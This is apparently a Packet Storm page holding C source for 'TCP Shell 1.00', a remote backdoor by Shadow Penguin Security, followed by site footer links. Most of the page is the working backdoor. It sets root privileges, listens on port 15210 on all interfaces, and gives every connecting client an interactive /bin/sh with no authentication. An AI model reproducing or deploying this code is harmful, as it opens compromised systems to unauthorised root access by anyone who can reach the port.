This is a backdoor program which can be accessed remotely as telnetd. TDM can not use telnet, rlogin, and ftp command, but this backdoor can use such command. However, you have to specify the correctry return code in the telnet client. If you can not change the return code, the "CR" code will be added and sent, so you type";" at the tail of your command.
64704ae0154649437e7a802c9cf79bf59162f704f6d62c5226fda356a3d9e97e/*=============================================================================
TCP Shell Version 1.00
The Shadow Penguin Security (https://shadowpenguin.backsection.net)
Written by UNYUN (unewn4th@usa.net)
=============================================================================
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>
#define MAX_CLIENTS 5 /* Max client num */
#define PORT_NUM 15210 /* Port */
void get_connection(socket_type, port, listener)
int socket_type;
int port;
int *listener;
{
struct sockaddr_in address;
struct sockaddr_in acc;
int listening_socket;
int connected_socket = -1;
int new_process;
int reuse_addr = 1;
int acclen=sizeof(acc);
memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = htons(port);
address.sin_addr.s_addr = htonl(INADDR_ANY);
listening_socket = socket(AF_INET, socket_type, 0);
if (listening_socket < 0) {
perror("socket");
exit(1);
}
if (listener != NULL) *listener = listening_socket;
setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,
(void *)&reuse_addr,sizeof(reuse_addr));
if (bind(listening_socket,(struct sockaddr *)&address,sizeof(address))<0){
perror("bind");
close(listening_socket);
exit(1);
}
if (socket_type == SOCK_STREAM){
if (listen(listening_socket, MAX_CLIENTS)==-1){
perror("listen");
exit(1);
}
}
}
void sock_puts(sockfd, str)
int sockfd;
char *str;
{
char x[2000],*buf;
size_t bytes_sent = 0;
int this_write,count;
sprintf(x,"\r%s",str);
count=strlen(x);
buf=x;
while (bytes_sent < count) {
do
this_write = write(sockfd, buf, count - bytes_sent);
while ( (this_write < 0) && (errno == EINTR) );
if (this_write <= 0) return;
bytes_sent += this_write;
buf += this_write;
}
}
int main(argc, argv)
int argc;
char *argv[];
{
void get_connection();
void sock_puts();
int i,sz;
int sock;
static int listensock = -1;
struct sockaddr_in sad;
setuid(0);
setgid(0);
for (;;){
get_connection(SOCK_STREAM, PORT_NUM, &listensock);
sz=sizeof(struct sockaddr_in);
for (;;){
if ((sock=accept(listensock,(void *)&sad,&sz))==-1){
perror("Accept");
exit(1);
}
if (fork()==0){
sock_puts(sock,"The ShadowPenguin Systems Inc. TCP Shell 1.00 Developed by UNYUN.\n");
for (i=0;i<3;i++){
close(i); dup2(sock,i);
}
execl("/bin/sh","sh","-i",0);
close(sock);
break;
}
}
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed